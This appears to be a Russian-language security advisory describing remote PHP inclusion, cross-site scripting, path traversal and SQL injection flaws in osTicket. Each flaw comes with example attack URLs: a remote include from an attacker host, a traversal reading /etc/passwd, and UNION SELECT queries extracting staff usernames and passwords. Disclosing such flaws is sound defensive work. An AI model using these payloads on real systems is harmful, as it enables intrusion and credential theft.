Программа: osTicket
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный php сценарий, произвести XSS нападение, просмотреть файлы на системе и выполнить произвольные SQL команды в базе данных приложения.
1. PHP инклюдинг возможен при включенных инклюдах и глобальных переменных в конфигурационном файле php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Пример:
http://[target]/include/main.php?config[search_disp]= true&include_dir=http://attacker
2. Межсайтовый скриптинг возможен из-за некорректной обработки входных данных в нескольких параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/view.php?e=test@test.com&t=480826[XSS]
http://[target]/include/header.php?osticket_title= %3C/title%3E[XSS]
h ttp://[target]/include/admin_login.php?em=asdf[XSS]
http://[target]/include/user_login.php?e=asdf[XSS]
http://[target]/include/open_submit.php?err=[XSS]
3. Уязвимость существует в сценарии 'attachments.php' при включенной опции загрузки файлов на сервер. Удаленный пользователь может просмотреть произвольные файлы на системе.
Пример:
http://[target]/attachments.php?file= ../../../../../../.. /etc/passwd
4. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения.
Примеры:
http://[target]/admin.php?a=view&id=-99%20UNION%20SELECT %20username,password,0,0,0,0,0,0,0,0,0%20FROM%20
ticket_reps%20WHERE%201/*
http://[target ]/admin.php?a=view&id=-99%20UNION%20SELECT%20
username,password,'your@email.org',0,0,0,0,0,0,0,0%20FROM
%20ticket_reps%20WHERE%201/*
http://[target]/view.php?s=advanced&query=&cat=-99%20UNION %20SELECT%2031337,0,0,0,password%20FROM%20
ticket_reps%20WHERE%20ID=5/*&status=&sort=ID&way= ASC&per=5&search_submit=Search